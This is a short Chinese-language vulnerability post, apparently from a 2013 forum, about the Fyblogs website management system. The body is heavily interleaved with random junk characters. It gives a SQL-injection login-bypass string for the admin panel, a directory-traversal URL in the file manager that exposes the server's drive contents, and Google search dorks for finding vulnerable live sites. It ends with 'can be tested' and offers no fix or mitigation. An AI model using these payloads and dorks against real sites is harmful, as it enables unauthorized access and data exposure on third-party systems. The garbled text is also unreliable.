漏洞类型: 未授权访问/权限绕过
1 j9 t. h! ~4 ~5 G
! x5 f. [) _$ M6 u* t& Q8 J简要描述:, ^! p2 L' p, W7 y. w* Y8 R; v
3 ?; o& k% l4 {6 v# [; {6 ?4 v
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
! G4 G, g x. m" v: Z1 U! @0 H( q, k
详细说明:, P k, y) b- f0 h
1 r* `, g, h" ]' d, M" s
后台万能密码 'or'='or') H T7 r+ {- w1 B4 w
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!/ _% D$ B. `/ z0 X5 ^3 ~
admin/uploadfile.asp?currentFolder=/upfiles/../% S# ~' {. D4 d$ N2 t) z8 Z: ?+ [
- t* \8 ~" w1 D漏洞证明:
2 s9 D( x" d( \
: M8 c6 y6 _+ ~* D' A谷歌:inurl:type.asp?id=1 新闻中心
8 y/ d: l1 f8 {+ _或者 :inurl:download_ok.asp?+ t' z" N. |. p" r/ b6 L
7 a3 }% I4 k6 k. I. R* o$ D, x可以测试5 o* n! N! r. Q+ o( D! J
9 l( C% U/ G+ o, t
* w0 S5 f+ W' c
|
发表于 2013-3-7 13:07:46
收藏
支持
反对